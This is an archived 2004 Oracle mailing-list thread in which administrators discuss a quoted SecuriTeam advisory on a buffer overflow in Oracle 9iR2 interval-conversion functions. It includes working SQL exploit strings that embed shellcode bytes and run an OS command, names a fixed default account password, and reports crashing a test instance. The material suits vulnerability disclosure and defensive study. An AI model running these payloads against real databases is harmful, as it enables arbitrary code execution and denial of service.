Oracle 9.2.0.3 on Win2K, shutdown the instance and the
Oracle service.
Pretty serious bug to me.
mohammed
--- Jared.Still@(protected) wrote:
> Has anyone here heard of this?
>
> First I 've seen it. Could not get the exploit to
> work on 8i or 9i,
> haven 't tried 10g.
>
> It does however cause an ORA-3113 (See ORA-3113.ora-code.com).
>
> Jared
>
> =================================
>
> The following security advisory is sent to the
> securiteam mailing list,
> and can be found at the SecuriTeam web site:
> http://www.securiteam.com
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate,
> Independent.
>
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html
>
>
> - - - - - - - - -
> Oracle Database 9ir2 Interval Conversion Buffer
> Overflow
> Oracle Database Server is one of the most used
> database servers in the
> world, it was marketed as being unbreakable and many
> people thinks that is
> one of the most secure database server in the
> market.
>
> Oracle Database Server provides two functions that
> can be used with PL/SQL
> to convert numbers to date/time intervals, these
> functions have buffer
> overflow vulnerabilities.
> Vulnerable Systems:
> * Oracle Database version 9ir2 and prior
>
> When any of these conversion functions are called
> with a long string as a
> second parameter a buffer overflow occurs.
>
> To reproduce the overflow execute the next PL/SQL:
> SELECT NUMTOYMINTERVAL(1, 'longstringhere ') from
> dual;
> SELECT NUMTODSINTERVAL(1, 'longstringhere ') from
> dual;
>
> Any Oracle Database user can exploit this
> vulnerability because access to
> these functions can 't be restricted. Exploitation of
> this vulnerability
> allow an attacker to execute arbitrary code, also it
> can be exploited to
> cause DOS (Denial of service) killing Oracle server
> process. An attacker
> can complete compromise the OS and database if
> Oracle is running on
> Windows platform, because Oracle must run under the
> local System account
> or under an administrative account. If Oracle is
> running on *nix then only
> the database could be compromised because Oracle
> runs mostly under oracle
> user which has restricted permissions.
>
> Important: Exploitation of these vulnerabilities
> becomes easy if Oracle Internet
> Directory has been deployed, because Oracle Internet
> Directory creates a
> database user called ODSCOMMON that has a default
> password ODSCOMMON, this
> password can not be changed, so any attacker can use
> this user to connect
> to database and exploit these vulnerabilities.
>
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and
> Linux confirm these vulnerabilities. Versions
> running in other OS
> platforms are believed to be affected too. Previous
> Oracle Database Server
> versions could be affected by these vulnerabilities.
>
>
> Exploits:
> -- These exploits should work on Windows 2000 Server
> and Windows XP, not
> tested on Windows 2003.
> -- Run any command at the end of the string
> SELECT
>
NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR '
> ||
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35)
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32)|| 'echo ARE YOU SURE?
> >c:\Unbreakable.txt ')
> ?FROM DUAL;
>
> SELECT
>
NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR '
> ||
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35)
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU
> SURE?
> >c:\Unbreakable.txt ') ?
>
> FROM DUAL;
>
> Vendor Fix:
> Go to Oracle Metalink site,
> http://metalink.oracle.com.
>
> Vendor Contact:
> Oracle was contacted and they released a fix without
> telling the public
> nor Ceaser anything and without issuing an alert.
> Additional Information:
> The information has been provided by Cesar.
>
<br > <font size=2 face= "sans-serif " >Here 's a link to the posting on BugTraq </font >
<br >
<br > <font size=2 face= "sans-serif " >http://cert.uni-stuttgart.de/archive/ntbugtraq/2004/02/msg00015.html </font >
<br > <font size=2 face= "sans-serif " > <br >
</font >
<br >
<br >
<br >
<table width=100% >
<tr valign=top >
<td >
<td > <font size=1 face= "sans-serif " > <b >Jared.Still@(protected) </b > </font >
<br > <font size=1 face= "sans-serif " >Sent by: oracle-l-bounce@(protected) </font >
<p > <font size=1 face= "sans-serif " > 02/26/2004 01:25 PM </font >
<br > <font size=2 face= "sans-serif " > </font > <font size=1 face= "sans-serif " >Please respond to oracle-l </font >
<br >
<td > <font size=1 face= "Arial " > </font >
<br > <font size=1 face= "sans-serif " > To: oracle-l@(protected) </font >
<br > <font size=1 face= "sans-serif " > cc: </font >
<br > <font size=1 face= "sans-serif " > Subject: Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow </font > </table >
<br >
<br >
<br > <font size=2 face= "sans-serif " > <br >
Mohammed, </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
Your email inspired my to try it on local database. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
After starting up a 9.2 database on my laptop, I ran the query. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
It did indeed create the file. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
The sqlplus session appears to be hung. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
The instance is still up though, as I can login from another CMD window. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
Next I tried running the query on a remote 9.2.0,3 instance on a Win2k server. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
It 's running SAP, but as it is our test server it is generally safe crash it without </font > <font size=3 face= "Times New Roman " > </font > <font size=2 face= "sans-serif " > <br >
repercussions. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
Which is exactly what happened. The query crashed the instance, killed the service. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
Agreed, it is a dangerous bug. </font > <font size=3 face= "Times New Roman " > <br >
</font > <font size=2 face= "sans-serif " > <br >
Jared </font > <font size=3 face= "Times New Roman " > <br >
<br >
<br >
<br >
<br >
</font >
<table width=100% >
<tr valign=top >
<td width=2% >
<td width=29% > <font size=1 face= "sans-serif " > <b >mkb <mkb125@(protected)> </b > </font > <font size=3 face= "Times New Roman " > </font > <font size=1 face= "sans-serif " > <br >
Sent by: oracle-l-bounce@(protected) </font > <font size=3 face= "Times New Roman " > </font >
<p > <font size=1 face= "sans-serif " > 02/26/2004 12:33 PM </font > <font size=3 face= "Times New Roman " > </font > <font size=2 face= "sans-serif " > <br >
</font > <font size=1 face= "sans-serif " >Please respond to oracle-l </font > <font size=3 face= "Times New Roman " > </font >
<td width=67% > <font size=1 face= "Arial " > </font > <font size=1 face= "sans-serif " > <br >
To: oracle-l@(protected) </font > <font size=3 face= "Times New Roman " > </font > <font size=1 face= "sans-serif " > <br >
cc: </font > <font size=3 face= "Times New Roman " > </font > <font size=1 face= "sans-serif " > <br >
Subject: Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow </font > </table >
<br > <font size=3 face= "Times New Roman " > <br >
<br >
</font > <font size=2 face= "Courier New " > <br >
Hmmmm..... <br >
<br >
Oracle 9.2.0.3 on Win2K, shutdown the instance and the <br >
Oracle service. <br >
<br >
Pretty serious bug to me. <br >
<br >
mohammed <br >
<br >
--- Jared.Still@(protected) wrote: <br >
> Has anyone here heard of this? <br >
> <br >
> First I 've seen it. Could not get the exploit to <br >
> work on 8i or 9i, <br >
> haven 't tried 10g. <br >
> <br >
> It does however cause an ORA-3113 (See ORA-3113.ora-code.com). <br >
> <br >
> Jared </font >
<br > <font size=2 face= "Courier New " >> <br >
> ================================= <br >
> <br >
> The following security advisory is sent to the <br >
> securiteam mailing list, <br >
> and can be found at the SecuriTeam web site: <br >
> http://www.securiteam.com <br >
> - - promotion <br >
> <br >
> The SecuriTeam alerts list - Free, Accurate, <br >
> Independent. <br >
> <br >
> Get your security news from a reliable source. <br >
> http://www.securiteam.com/mailinglist.html <br >
> <br >
> <br >
> - - - - - - - - - <br >
> Oracle Database 9ir2 Interval Conversion Buffer <br >
> Overflow <br >
> Oracle Database Server is one of the most used <br >
> database servers in the <br >
> world, it was marketed as being unbreakable and many <br >
> people thinks that is <br >
> one of the most secure database server in the <br >
> market. <br >
> <br >
> Oracle Database Server provides two functions that <br >
> can be used with PL/SQL <br >
> to convert numbers to date/time intervals, these <br >
> functions have buffer <br >
> overflow vulnerabilities. <br >
> Vulnerable Systems: <br >
> * Oracle Database version 9ir2 and prior <br >
> <br >
> When any of these conversion functions are called <br >
> with a long string as a <br >
> second parameter a buffer overflow occurs. <br >
> <br >
> To reproduce the overflow execute the next PL/SQL: <br >
> SELECT NUMTOYMINTERVAL(1, 'longstringhere ') from <br >
> dual; <br >
> SELECT NUMTODSINTERVAL(1, 'longstringhere ') from <br >
> dual; <br >
> <br >
> Any Oracle Database user can exploit this <br >
> vulnerability because access to <br >
> these functions can 't be restricted. Exploitation of <br >
> this vulnerability <br >
> allow an attacker to execute arbitrary code, also it <br >
> can be exploited to <br >
> cause DOS (Denial of service) killing Oracle server <br >
> process. An attacker <br >
> can complete compromise the OS and database if <br >
> Oracle is running on <br >
> Windows platform, because Oracle must run under the <br >
> local System account <br >
> or under an administrative account. If Oracle is <br >
> running on *nix then only <br >
> the database could be compromised because Oracle <br >
> runs mostly under oracle <br >
> user which has restricted permissions. <br >
> <br >
> Important: Exploitation of these vulnerabilities <br >
> becomes easy if Oracle Internet <br >
> Directory has been deployed, because Oracle Internet <br >
> Directory creates a <br >
> database user called ODSCOMMON that has a default </font >
<br > <font size=2 face= "Courier New " >> password ODSCOMMON, this <br >
> password can not be changed, so any attacker can use <br >
> this user to connect <br >
> to database and exploit these vulnerabilities. <br >
> <br >
> Full tests on Oracle database 9ir2 under Microsoft <br >
> Windows 2000 Server and <br >
> Linux confirm these vulnerabilities. Versions <br >
> running in other OS <br >
> platforms are believed to be affected too. Previous <br >
> Oracle Database Server <br >
> versions could be affected by these vulnerabilities. <br >
> <br >
> <br >
> Exploits: <br >
> -- These exploits should work on Windows 2000 Server <br >
> and Windows XP, not <br >
> tested on Windows 2003. <br >
> -- Run any command at the end of the string <br >
> SELECT <br >
> <br >
NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR ' <br >
> || <br >
> chr(59) || chr(79) || chr(150) || chr(01) || <br >
> chr(141) || chr(68) || <br >
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21) <br >
> || chr(52) || chr(35) <br >
> || chr(148) || chr(01) || chr(255) || chr(37) || <br >
> chr(172) || chr(33) || <br >
> chr(148) || chr(01) || chr(32)|| 'echo ARE YOU SURE? <br >
> >c:\Unbreakable.txt ') <br >
> ?FROM DUAL; <br >
> <br >
> SELECT <br >
> <br >
NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR ' <br >
> || <br >
> chr(59) || chr(79) || chr(150) || chr(01) || <br >
> chr(141) || chr(68) || <br >
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21) <br >
> || chr(52) || chr(35) <br >
> || chr(148) || chr(01) || chr(255) || chr(37) || <br >
> chr(172) || chr(33) || <br >
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU <br >
> SURE? <br >
> >c:\Unbreakable.txt ') ? <br >
> <br >
> FROM DUAL; <br >
> <br >
> Vendor Fix: <br >
> Go to Oracle Metalink site, <br >
> http://metalink.oracle.com. <br >
> <br >
> Vendor Contact: <br >
> Oracle was contacted and they released a fix without <br >
> telling the public <br >
> nor Ceaser anything and without issuing an alert. <br >
> Additional Information: <br >
> The information has been provided by Cesar. <br >
> <br >
</font >
<br >
<br >
